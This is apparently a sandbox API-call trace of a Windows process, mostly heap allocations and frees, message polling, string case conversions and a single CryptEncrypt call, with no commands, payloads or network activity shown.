[0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0223.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0223.669] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.669] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0223.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0223.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0223.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0223.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0223.678] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.678] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.678] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0223.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0223.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0223.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0223.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba70 [0223.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aabc38 [0223.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabc38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0223.679] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38667f8 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd10 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba70 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc68 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0223.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc68 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0223.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba58 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb48 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0223.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0223.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0223.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb60 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd28 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0223.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0223.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb48 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0223.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0223.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb48 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba88 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0223.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc98 [0223.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0223.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0223.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc68 [0223.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba70 [0223.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68460 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865b08 [0223.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38667f8 | out: hHeap=0x2af0000) returned 1 [0223.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0223.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0223.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0223.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0223.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0223.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0223.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0223.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0223.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0223.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0223.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0223.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0223.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0223.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0223.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0223.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0223.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.684] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0223.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0223.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0223.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0223.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0223.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0223.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0223.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0223.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0223.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0223.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0223.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0223.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0223.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0223.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.685] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0223.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69700 [0223.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0223.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0223.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0223.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0223.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0223.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0223.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0223.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0223.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0223.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0223.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0223.686] 